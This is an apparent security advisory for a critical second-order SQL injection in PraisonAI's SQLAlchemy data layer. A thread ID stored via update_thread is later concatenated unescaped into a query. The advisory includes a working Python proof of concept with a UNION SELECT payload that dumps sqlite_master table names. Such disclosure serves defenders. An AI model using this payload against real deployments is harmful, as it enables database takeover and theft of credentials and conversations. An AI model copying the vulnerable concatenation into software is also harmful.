PT-2026-53547 · Pypi · Praisonai
Publicado
2026-06-29
·
Atualizado
2026-06-29
CVSS v3.1
9.8
Crítica
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Summary
The
get all user threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update thread. When the application loads the thread list, the injected payload executes and grants full database access.Details
File Path:
src/praisonai/praisonai/ui/sql alchemy.pyFlow:
- Source (Line 539):
python
await data layer.update thread(thread id=payload, user id=user)- Hop (Line 547):
python
thread ids = "('" + "','".join([t["thread id"] for t in user threads]) + "')"- Sink (Line 576):
sql
WHERE s."threadId" IN {thread ids}Proof of Concept (PoC)
python
import asyncio
from praisonai.ui.sql alchemy import SQLAlchemyDataLayer
async def run poc():
data layer = SQLAlchemyDataLayer(conninfo="sqlite+aiosqlite:///app.db")
# Insert a valid thread
await data layer.update thread(
thread id="valid thread",
user id="attacker"
)
# Inject malicious payload
payload = "x') UNION SELECT name, null, null, 'valid thread', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM sqlite master--"
await data layer.update thread(
thread id=payload,
user id="attacker"
)
# Trigger vulnerable function
result = await data layer.get all user threads(user id="attacker")
for thread in result:
if getattr(thread, 'id', '') == 'valid thread':
for step in getattr(thread, 'steps', []):
print(getattr(step, 'id', ''))
asyncio.run(run poc())
# Expected Output:
# sqlite master table names printed to consoleImpact
An attacker can achieve full database compromise, including:
- Exfiltration of sensitive data (user emails, session tokens, API keys)
- Access to all conversation histories
- Ability to modify or delete database contents
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Praisonai